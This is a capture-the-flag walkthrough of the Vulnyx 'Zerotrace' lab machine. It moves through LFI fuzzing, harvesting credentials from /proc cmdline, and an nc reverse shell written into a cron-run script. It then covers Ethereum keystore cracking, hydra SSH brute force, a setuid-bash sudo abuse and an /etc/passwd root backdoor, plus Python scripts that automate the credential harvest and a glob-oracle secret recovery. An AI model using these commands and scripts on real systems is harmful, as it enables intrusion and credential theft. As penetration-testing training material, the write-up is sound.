Vulnyx-Zerotrace-Walkthrough
Author: 城南花已开

Information Gathering

Service Detection

```
sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e3:f6:57 VMware, Inc.
192.168.60.237 08:00:27:71:45:ac PCS Systemtechnik GmbH
192.168.60.254 00:50:56:f3:f4:8b VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.049 seconds (124.94 hosts/sec). 4 responded
export ip=192.168.60.237
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
I don't always scan ports, but when I do, I prefer RustScan.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.237:22
Open 192.168.60.237:80
Open 192.168.60.237:8000
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-14 10:21 CST
Initiating ARP Ping Scan at 10:21
Scanning 192.168.60.237 [1 port]
Completed ARP Ping Scan at 10:21, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:21
Completed Parallel DNS resolution of 1 host. at 10:21, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 10:21
Scanning 192.168.60.237 [3 ports]
Discovered open port 80/tcp on 192.168.60.237
Discovered open port 22/tcp on 192.168.60.237
Discovered open port 8000/tcp on 192.168.60.237
Completed SYN Stealth Scan at 10:21, 0.04s elapsed (3 total ports)
Nmap scan report for 192.168.60.237
Host is up, received arp-response (0.00039s latency).
Scanned at 2025-03-14 10:21:52 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
8000/tcp open http-alt syn-ack ttl 64
MAC Address: 08:00:27:71:45:AC (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
Raw packets sent: 4 (160B) | Rcvd: 4 (160B)
```

Directory Enumeration

```
❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 404,403
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.237
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404,403
[+] User Agent: gobuster/3.6
[+] Extensions: txt,php,html,zip
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 9120]
/images (Status: 301) [Size: 169] [--> http://192.168.60.237/images/]
/assets (Status: 301) [Size: 169] [--> http://192.168.60.237/assets/]
/generic.html (Status: 200) [Size: 5918]
/elements.html (Status: 200) [Size: 22072]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================
```

Nothing of value there, it seems.

Next, port 8000.

It is an FTP service written in Python (pyftpdlib 1.5.7, according to the banner).

Anonymous login is not allowed.

```
❯ nc $ip 8000
220 pyftpdlib 1.5.7 ready.
ls
^C
❯ ftp anonymous@$ip 8000
Connected to 192.168.60.237.
220 pyftpdlib 1.5.7 ready.
331 Username ok, send password.
Password:
530 Anonymous access not allowed.
ftp: Login failed
ftp> exit
221 Goodbye.
```

There is nothing else to go on, so switch wordlists and enumerate the directories again.

```
❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/raft-large-files-lowercase.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.237
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-large-files-lowercase.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 9120]
/. (Status: 200) [Size: 9120]
/.admin (Status: 301) [Size: 169] [--> http://192.168.60.237/.admin/]
Progress: 176625 / 176630 (100.00%)
===============================================================
Finished
===============================================================
```

Enumerate again under the .admin directory.

This finds tool.php, but it responds with an empty body (Size: 0).

```
❯ gobuster dir -u http://$ip/.admin/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-files-lowercase.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.237/.admin/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-large-files-lowercase.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/tool.php (Status: 200) [Size: 0]
Progress: 176625 / 176630 (100.00%)
===============================================================
Finished
===============================================================
```

LFI (Local File Inclusion)

An empty PHP page under an admin directory that takes no visible input suggests it includes whatever file a parameter names, so fuzz for the parameter name, using /etc/passwd as the value and filtering out the empty (0-word) responses.

The parameter is file.

```
❯ wfuzz -c -u "http://$ip/.admin/tool.php?FUZZ=/etc/passwd" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt --hw 0
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://192.168.60.237/.admin/tool.php?FUZZ=/etc/passwd
Total requests: 207643

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000000741: 200 24 L 28 W 1163 Ch "file"
```

Reading /etc/passwd shows that, besides root, three users have a login shell:

```
❯ curl -s 'http://192.168.60.237/.admin/tool.php?file=/etc/passwd' |grep /bin/bash
root:x:0:0:root:/root:/bin/bash
ll104567:x:1000:1000::/home/ll104567:/bin/bash
J4ckie0x17:x:1002:1002:,,,:/home/J4ckie0x17:/bin/bash
shelldredd:x:1003:1003::/home/shelldredd:/bin/bash
```

I tried reading the users' private keys, but they could not be read.

Apart from /etc/passwd and /etc/hosts, a file-inclusion wordlist finds nothing else readable.

```
❯ wfuzz -c -u "http://$ip/.admin/tool.php?file=FUZZ" -w ../thl/file_inclusion_linux.txt --hw 0
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://192.168.60.237/.admin/tool.php?file=FUZZ
Total requests: 2299

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000000899: 200 7 L 22 W 189 Ch "/etc/hosts"
000001016: 200 24 L 28 W 1163 Ch "/etc/passwd"

Total time: 2.391690
Processed Requests: 2299
Filtered Requests: 2297
Requests/sec.: 961.2446
```

Fuzzing /proc

I tried reading the kernel scheduler information in /proc/sched_debug, with no result.

However, /proc/<pid>/cmdline is readable, so enumerate the cmdline of every PID in a range.

PID 329 stands out: its response contains far more words (12 W) than the others.

```
❯ wfuzz -c -u "http://$ip/.admin/tool.php?file=/proc/FUZZ/cmdline" -z range,1-1000 --hw 0
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://192.168.60.237/.admin/tool.php?file=/proc/FUZZ/cmdline
Total requests: 1000

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000000001: 200 0 L 1 W 11 Ch "1"
000000231: 200 0 L 1 W 27 Ch "231"
000000204: 200 0 L 1 W 30 Ch "204"
000000340: 200 0 L 1 W 109 Ch "340"
000000337: 200 0 L 1 W 140 Ch "337"
000000329: 200 0 L 12 W 120 Ch "329"
000000315: 200 0 L 1 W 18 Ch "315"
000000307: 200 0 L 1 W 28 Ch "307"
000000305: 200 0 L 1 W 105 Ch "305"
000000303: 200 0 L 1 W 18 Ch "303"
000000379: 200 0 L 3 W 43 Ch "379"
000000367: 200 0 L 4 W 78 Ch "367"
000000437: 200 0 L 3 W 49 Ch "437"
000000436: 200 0 L 9 W 71 Ch "436"
000000430: 200 0 L 8 W 56 Ch "430"
000000801: 200 0 L 3 W 78 Ch "801"
000000794: 200 0 L 3 W 78 Ch "794"
000000793: 200 0 L 3 W 78 Ch "793"
000000792: 200 0 L 3 W 78 Ch "792"

Total time: 1.055091
Processed Requests: 1000
Filtered Requests: 981
Requests/sec.: 947.7847
```

Fetch it with curl. cmdline is argv joined with NUL bytes, so --output - writes the raw bytes to stdout; the NULs are invisible in the terminal, which is why it reads as /bin/sh-cpython3 ..., and the trailing % is the shell's marker for a missing newline, not part of the password.

This yields the FTP credential J4ckie0x17:uhIpiRnUBwAHaG.EkeN-oKUfozESUnx3zCIxpuhAd, passed to pyftpdlib on the command line with -u and -P, where any local user (or, as here, a file-read bug) can see it.

```
❯ curl  'http://192.168.60.237/.admin/tool.php?file=/proc/329/cmdline' --output -
/bin/sh-cpython3 -m pyftpdlib -p 8000 -w -d /var/www/html/ -u J4ckie0x17 -P uhIpiRnUBwAHaG.EkeN-oKUfozESUnx3zCIxpuhAd%
```
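The PID sweep and the NUL-separated cmdline parsing above can be automated. The script below is an added example for this walkthrough, not code from the original post: it pulls /proc/<pid>/cmdline through the file parameter, splits the NUL-separated argv, unwraps the `/bin/sh -c '...'` wrapper that hides the real command in one string, and flags user/password-style arguments. The base URL defaults to the box's address from the page; the flag tables and the sample cmdline (the page's PID 329 output with its NULs restored) are constructed for the example.

```python
"""Harvest /proc/<pid>/cmdline through tool.php?file= and pick out credential-bearing arguments.

Added example for this walkthrough; the flag tables and SAMPLE_PID_329 are assumptions/constructed.
"""
import shlex
import sys
import urllib.error
import urllib.request
from typing import Optional
from urllib.parse import quote

# Flags that commonly carry a secret on the command line. -p is deliberately absent:
# for pyftpdlib (and most daemons) it is the port, not a password.
USER_FLAGS = {"-u", "--user", "--username", "--login"}
PASS_FLAGS = {"-P", "--password", "--pass", "--passwd"}

# Constructed sample: PID 329 from the walkthrough with the NUL separators restored
# (the terminal swallows them, which is why curl shows "/bin/sh-cpython3 ...").
SAMPLE_PID_329 = (
    b"/bin/sh\x00-c\x00python3 -m pyftpdlib -p 8000 -w -d /var/www/html/ "
    b"-u J4ckie0x17 -P uhIpiRnUBwAHaG.EkeN-oKUfozESUnx3zCIxpuhAd\x00"
)


def fetch_cmdline(base_url: str, pid: int, timeout: float = 5.0) -> bytes:
    """GET /proc/<pid>/cmdline via the LFI; tool.php returns the file's raw bytes."""
    url = f"{base_url}/.admin/tool.php?file={quote(f'/proc/{pid}/cmdline')}"
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read()


def split_cmdline(raw: bytes) -> list:
    """cmdline is argv joined by NUL and NUL-terminated; kernel threads have an empty one."""
    if not raw.rstrip(b"\x00"):
        return []
    return [a.decode("utf-8", "replace") for a in raw.rstrip(b"\x00").split(b"\x00")]


def expand_shell_wrapper(argv: list) -> list:
    """`/bin/sh -c '<command>'` hides the real argv inside one string; split it as the shell would."""
    if len(argv) >= 3 and argv[0].rsplit("/", 1)[-1] in ("sh", "bash", "dash") and argv[1] == "-c":
        return shlex.split(argv[2])
    return argv


def extract_credentials(argv: list) -> dict:
    """Return {'user': ..., 'password': ...} for flags given as `-P secret` or `--password=secret`."""
    argv = expand_shell_wrapper(argv)
    found = {}
    for i, tok in enumerate(argv):
        flag, has_eq, inline = tok.partition("=")
        nxt: Optional[str] = argv[i + 1] if i + 1 < len(argv) else None
        value = inline if has_eq else nxt
        if value is None:
            continue
        if flag in USER_FLAGS:
            found["user"] = value
        elif flag in PASS_FLAGS:
            found["password"] = value
    return found


def harvest(base_url: str, pids=range(1, 1001)) -> list:
    """Sweep a PID range over the LFI; returns (pid, argv, credentials) for every live process."""
    results = []
    for pid in pids:
        try:
            raw = fetch_cmdline(base_url, pid)
        except (urllib.error.URLError, OSError):
            continue
        argv = split_cmdline(raw)
        if argv:
            results.append((pid, argv, extract_credentials(argv)))
    return results


if __name__ == "__main__":
    base = sys.argv[1] if len(sys.argv) > 1 else "http://192.168.60.237"
    for pid, argv, creds in harvest(base):
        marker = "  <-- credentials" if creds else ""
        print(f"{pid:>6}  {' '.join(argv)}{marker}")
```

The point of the sweep is that /proc is world-readable by design; anything a service is started with on its command line is visible to every local user, and a file-read primitive in a web application turns that into a remote secret leak.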

User Privilege Escalation

Try the credential over SSH, in case the password is reused for the system account:

```
❯ ssh J4ckie0x17@$ip
The authenticity of host '192.168.60.237 (192.168.60.237)' can't be established.
ED25519 key fingerprint is SHA256:4K6G5c0oerBJXgd6BnT2Q3J+i/dOR4+6rQZf20TIk/U.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.237' (ED25519) to the list of known hosts.
[email protected]'s password:
J4ckie0x17@zerotrace:~$ ls -al
total 28
drwx------ 3 J4ckie0x17 J4ckie0x17 4096 mar 11 21:20 .
drwxr-xr-x 5 root root 4096 mar 11 23:39 ..
lrwxrwxrwx 1 root root 9 mar 11 20:38 .bash_history -> /dev/null
-rw-r--r-- 1 J4ckie0x17 J4ckie0x17 220 mar 11 18:37 .bash_logout
-rw-r--r-- 1 J4ckie0x17 J4ckie0x17 3526 mar 11 18:37 .bashrc
drwxr-xr-x 3 J4ckie0x17 J4ckie0x17 4096 mar 11 18:37 .local
-rw-r--r-- 1 J4ckie0x17 J4ckie0x17 807 mar 11 18:37 .profile
-rw-r--r-- 1 J4ckie0x17 J4ckie0x17 66 mar 11 18:37 .selected_editor
J4ckie0x17@zerotrace:~$ sudo -l
[sudo] contraseña para J4ckie0x17:
Sorry, user J4ckie0x17 may not run sudo on zerotrace.
```

Local enumeration turns up a hint in /opt/.nobodyshouldreadthis:

```
J4ckie0x17@zerotrace:/opt/.nobodyshouldreadthis$ cat destiny
I don't know where it (or they) will take me, but I will always know that Windows is trash.
```

I also uploaded pspy64 to watch the processes the system runs.

It shows that a cron job periodically runs the destiny file as UID 1003:

```
2025/04/02 08:21:27 CMD: UID=0     PID=1      | /sbin/init
2025/04/02 08:22:01 CMD: UID=1003 PID=12419 | /bin/sh -c /bin/bash /opt/.nobodyshouldreadthis/destiny
2025/04/02 08:22:01 CMD: UID=0 PID=12418 | /usr/sbin/CRON -f
------------------------------------------
J4ckie0x17@zerotrace:/tmp$ id 1003
uid=1003(shelldredd) gid=1003(shelldredd) grupos=1003(shelldredd)
```

And the file is world-writable (-rwxrw-rw-), so we have permission to modify it.

```
J4ckie0x17@zerotrace:/opt/.nobodyshouldreadthis$ ls -al
total 12
drwxrwxrwx 2 shelldredd shelldredd 4096 mar 12 16:00 .
drwxr-xr-x 4 root root 4096 mar 11 23:43 ..
-rwxrw-rw- 1 shelldredd shelldredd 92 mar 12 16:00 destiny
```

The mode bits are not the whole story; lsattr shows a file's extended attributes:

```
J4ckie0x17@zerotrace:/opt/.nobodyshouldreadthis$ lsattr destiny
----i---------e------- destiny
```

i (immutable): the file cannot be deleted, modified, renamed or hard-linked until the attribute is removed with chattr -i.

e (extents): the file is stored using extents (normal on ext4); irrelevant here.

Remove the i attribute and replace the script with a reverse shell. Normally chattr -i requires CAP_LINUX_IMMUTABLE, which an unprivileged user does not have, so the command succeeding here is itself a misconfiguration worth noting (the walkthrough does not show why; getcap or ls -l on the chattr binary would tell).

```
J4ckie0x17@zerotrace:/opt/.nobodyshouldreadthis$ chattr -i destiny
J4ckie0x17@zerotrace:/opt/.nobodyshouldreadthis$ lsattr destiny
--------------e------- destiny
J4ckie0x17@zerotrace:/opt/.nobodyshouldreadthis$ echo "nc -e /bin/bash 192.168.60.100 4444" > destiny
```

ETH Wallet Cracking

Listen on the port and wait for the cron job to fire:

```
❯ pwncat-cs -lp 4444
[14:32:52] Welcome to pwncat 🐈! __main__.py:164
[14:33:02] received connection from 192.168.60.237:53718 bind.py:84
[14:33:03] 0.0.0.0:4444: normalizing shell path manager.py:957
192.168.60.237:53718: registered new host w/ db manager.py:957
(local) pwncat$
(remote) shelldredd@zerotrace:/home/shelldredd$
```

Back in /opt there is a directory that only shelldredd can read:

```
(remote) shelldredd@zerotrace:/opt/cryptovault/ll104567$ ls -al
total 256
drwx------ 2 shelldredd shelldredd 4096 mar 12 15:38 .
drwx------ 3 shelldredd shelldredd 4096 mar 11 23:42 ..
-rwx------ 1 shelldredd shelldredd 142 mar 11 23:45 notes.txt
-rwx------ 1 shelldredd shelldredd 492 mar 11 23:43 secret
-rw-r--r-- 1 shelldredd shelldredd 245179 mar 12 15:36 why.png
(remote) shelldredd@zerotrace:/opt/cryptovault/ll104567$ cat notes.txt
I am going to write my wishes here:

Solve a Rubik's cube in 10 seconds

Make The Flash run slower

Reach 1000 videos on Bilibili
(remote) shelldredd@zerotrace:/opt/cryptovault/ll104567$ cat secret
{"address":"2891efcaa457d4d44dc724c4fa015fe8be4e279e","crypto":{"cipher":"aes-128-ctr","ciphertext":"fee023fd8fcd5b242b0ad4900de2d4614fa4be48887efbd6208a9beb65923df7","cipherparams":{"iv":"7183f2eea51e68d818fe976daf18327d"},"kdf":"scrypt","kdfparams":{"dklen":32,"n":262144,"p":1,"r":8,"salt":"abb71ccb91d0ec97831d49694bd80ce925c0204772fa6268ace1f73df97e3d71"},"mac":"4ed5177b17ad85eafafd3dedc40a3c85914d18611c2cca079871a28487055892"},"id":"0c431e07-6087-4368-a973-ed3fb4ec5045","version":3}
(remote) shelldredd@zerotrace:/opt/cryptovault/ll104567$ file why.png
why.png: PNG image data, 541 x 378, 8-bit/color RGB, non-interlaced
(remote) shelldredd@zerotrace:/opt/cryptovault/ll104567$
(local) pwncat$ download why.png
why.png ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 245.2/245.2 kB • ? • 0:00:00
[14:37:14] downloaded 245.18KiB in 0.14 seconds download.py:71
(local) pwncat$
```

Look at the image: haha, it's Trump 🤣

"You are the chosen one"

[image: why.png]

Suspecting steganography, run zsteg. It reports OpenPGP key signatures in several bit planes,

but these are the usual zsteg false positives (file-type guesses on bit-plane noise) and lead nowhere.

```
❯ zsteg why.png
imagedata .. text: "%$\"---!!"
b1,r,msb,xy .. file: OpenPGP Public Key
b1,g,lsb,xy .. file: OpenPGP Public Key
b1,b,lsb,xy .. file: OpenPGP Secret Key
b2,rgb,lsb,xy .. file: OpenPGP Secret Key
b3,b,lsb,xy .. text: "V@NKx)I,,K"
b4,r,lsb,xy .. text: "vd23TdC3V"
b4,r,msb,xy .. file: OpenPGP Secret Key
b4,g,lsb,xy .. text: "fD33\"3EVx"
b4,b,lsb,xy .. text: "#3D#3EgVeUw"
b4,rgb,lsb,xy .. text: "u6tgTd5RD5Sv\\"
b4,bgr,lsb,xy .. text: "5tvWddU4BU6s"
```

I also threw secret at GPT for analysis,

and it is an encrypted Ethereum keystore: version 3 JSON, scrypt KDF (n=262144) with aes-128-ctr, so the wallet's private key is protected only by the passphrase.

Crack it with john: ethereum2john converts the keystore into a hash line, and john runs the scrypt derivation for each candidate. scrypt at n=262144 is slow, about 11 candidates per second here, but the result came after roughly four and a half minutes.

The passphrase is dragonballz.

```
❯ vi secret
❯ ethereum2john secret >hash
WARNING: Upon successful password recovery, this hash format may expose your PRIVATE KEY. Do not share extracted hashes with any untrusted parties!
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (ethereum, Ethereum Wallet [PBKDF2-SHA256/scrypt Keccak 256/256 AVX2 8x])
Cost 1 (iteration count) is 262144 for all loaded hashes
Cost 2 (kdf [0:PBKDF2-SHA256 1:scrypt 2:PBKDF2-SHA256 presale]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
dragonballz (secret)
1g 0:00:04:34 DONE (2025-04-02 14:59) 0.003646g/s 11.66p/s 11.66c/s 11.66C/s grecia..imissu
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```

There is also a readable file in ll104567's home directory.

The hint is to join two universes: combine the wallet passphrase (Dragon Ball) with this One-Punch Man name list.

```
(remote) shelldredd@zerotrace:/home/ll104567$ cat one
Why don't we join two universes and see who's the strongest?
saitama
genos
mumen
speed-o
fubuki
bang
tatsumaki
boros
drkuseno
onepunchman
karin
zombieman
childemperor
stinger
```

Build the wordlist by concatenating dragonballz with each name in both orders:

Brute-force SSH with hydra; the credential is ll104567:dragonballzonepunchman.

```
❯ vi dic.txt
❯ awk '{print "dragonballz" $1 ;print $1 "dragonballz"}' dic.txt>pass.txt
❯ hydra -l ll104567 -P pass.txt $ip ssh -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-04-02 15:07:55
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 30 login tries (l:1/p:30), ~2 tries per task
[DATA] attacking ssh://192.168.60.237:22/
[22][ssh] host: 192.168.60.237 login: ll104567 password: dragonballzonepunchman
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-04-02 15:08:02
```

Root Privilege Escalation

Log in over SSH and grab the user flag:

```
❯ ssh ll104567@$ip
[email protected]'s password:
ll104567@zerotrace:~$ cat user.txt
yLFsSkfsLjQQKm49HCkwBtiY60ESXH3s
```

sudo -l shows that the user may run one bash script as root without a password:

```
ll104567@zerotrace:~$ sudo -l
Matching Defaults entries for ll104567 on zerotrace:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User ll104567 may run the following commands on zerotrace:
(ALL) NOPASSWD: /bin/bash /home/ll104567/guessme
ll104567@zerotrace:~$ file guessme
guessme: Bourne-Again shell script, ASCII text executable
ll104567@zerotrace:~$ cat guessme
#!/bin/bash
FTP_USER="admin"
FTP_PASS=$(cat /root/.creds)

echo -n "Please provide the password for $FTP_USER: "
read -s INPUT_PASS
echo

CLEAN_PASS=$(echo "$INPUT_PASS" | sed 's/[[:space:]]//g')

if [[ $FTP_PASS == $CLEAN_PASS ]]; then
    echo "Password matches!"
    exit 0
else
    echo "Access denied!"
    exit 1
fi
```

Entering * passes the check. Inside [[ ]] the right-hand side of == is treated as a glob pattern when it is unquoted, so * matches any value of /root/.creds, and the sed only strips whitespace, so the * survives. Matching just prints a message, but the same unquoted comparison is also an oracle: a prefix followed by * is accepted too, so the contents of /root/.creds could be recovered one character at a time.

```
ll104567@zerotrace:~$ sudo /bin/bash /home/ll104567/guessme
Please provide the password for admin:
Password matches!
```
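The prefix oracle is worth seeing in code, because the quoting bug is common and the leak is worse than a yes/no bypass. The script below is an added example for this walkthrough, not the page's code. bash_glob_equal() reproduces guessme's unquoted comparison in a child bash so the recovery can be exercised offline, bash_quoted_equal() is the fixed form, and guessme_oracle() drives the real sudo rule on the box (it only works as ll104567 on zerotrace and is an assumption about how the script answers). Glob metacharacters in the secret are probed with bracket expressions ([*] matches a literal *); backslash is excluded because the script's read without -r would consume it, and whitespace because the sed strips it.

```python
"""Use guessme's unquoted [[ $FTP_PASS == $CLEAN_PASS ]] as a glob oracle to recover /root/.creds.

Added example for this walkthrough. bash_glob_equal() reproduces the script's comparison locally
so the technique can be exercised offline; guessme_oracle() drives the real sudo rule on the box.
"""
import string
import subprocess
from typing import Callable, Optional

GUESSME = "/home/ll104567/guessme"          # the path fixed by the sudo rule on the page

# Backslash is left out: guessme reads with `read -s` (no -r), which consumes it.
# Whitespace is left out: the script's sed strips it before comparing.
DEFAULT_CHARSET = string.ascii_letters + string.digits + string.punctuation.replace("\\", "")


def bash_glob_equal(stored: str, candidate: str) -> bool:
    """The vulnerable comparison: an unquoted right-hand side of == inside [[ ]] is a glob pattern."""
    return subprocess.run(["bash", "-c", "[[ $1 == $2 ]]", "_", stored, candidate]).returncode == 0


def bash_quoted_equal(stored: str, candidate: str) -> bool:
    """The fix: quoting the right-hand side turns == into a literal string comparison."""
    return subprocess.run(["bash", "-c", '[[ $1 == "$2" ]]', "_", stored, candidate]).returncode == 0


def guessme_oracle(candidate: str) -> bool:
    """Ask the real script (assumption: works only as ll104567 on zerotrace); true on 'Password matches!'."""
    r = subprocess.run(["sudo", "/bin/bash", GUESSME], input=candidate + "\n",
                       capture_output=True, text=True)
    return "Password matches!" in r.stdout


def glob_literal(s: str) -> str:
    """Quote glob metacharacters so a probe matches them literally: [*] matches a single '*'."""
    return "".join(f"[{c}]" if c in "*?[]" else c for c in s)


def recover_secret(oracle: Callable[[str], bool], charset: str = DEFAULT_CHARSET,
                   max_len: int = 64) -> Optional[str]:
    """Extend a known prefix one character at a time: '<prefix><c>*' is accepted iff c comes next."""
    guess = ""
    while not oracle(glob_literal(guess)):          # exact probe (no trailing '*'): a match means done
        if len(guess) >= max_len:
            return None
        for c in charset:
            if oracle(glob_literal(guess + c) + "*"):
                guess += c
                break
        else:
            return None                              # next character is outside the charset
    return guess


if __name__ == "__main__":
    print(recover_secret(guessme_oracle))
```

Each recovered character costs at most one probe per charset entry, so a secret of length n falls in O(n * |charset|) runs of the script instead of the exponential search a proper comparison would force. The one-token fix is quoting: `[[ $FTP_PASS == "$CLEAN_PASS" ]]`, or the POSIX `[ "$FTP_PASS" = "$CLEAN_PASS" ]`.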

But the script lives in the user's own home directory, and the sudo rule fixes the path, not the contents, so just rename it and put our own script in its place 😅

Write a new script at the same path and run it; the copied bash is set-uid root, and -p keeps the effective privileges:

```
ll104567@zerotrace:~$ mv guessme 11
ll104567@zerotrace:~$ echo "cp /bin/bash /tmp/sh;chmod +s /tmp/sh">guessme
ll104567@zerotrace:~$ chmod +x guessme
ll104567@zerotrace:~$ sudo /bin/bash /home/ll104567/guessme
ll104567@zerotrace:~$ cd /tmp/
ll104567@zerotrace:/tmp$ ls
linpeas.sh pspy64 sh systemd-private-9eedb78f1cd3445d8fa1f3f69f9ff682-systemd-logind.service-mXg3PA
ll104567@zerotrace:/tmp$ ./sh -p
sh-5.2# whoami
root
sh-5.2# echo 'primary:zSZ7Whrr8hgwY:0:0::/root:/bin/bash'>>/etc/passwd
sh-5.2# exit
exit
ll104567@zerotrace:/tmp$ su primary
Contraseña:
root@zerotrace:/tmp# cd ~
root@zerotrace:~# cat root.txt
0IB3gKtQ82ZBpyvwDo1Gp55snCElXC7U
```